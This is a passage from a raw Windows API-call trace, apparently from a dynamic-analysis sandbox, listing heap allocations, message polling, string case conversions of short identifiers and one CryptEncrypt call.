dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.340] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0268.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0268.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0268.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0268.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0268.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0268.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0268.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0268.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0268.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0268.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0268.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.343] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0268.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.344] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.344] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0268.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.345] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.345] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.345] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.345] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.346] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.346] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.350] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0268.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.352] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.352] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.352] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.353] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.353] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.354] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0268.354] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.355] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0268.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0268.355] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.356] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.356] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.356] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.356] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0268.356] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0268.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0268.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f3fc8 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.361] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0268.363] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x17c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x180) returned 1 [0268.363] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 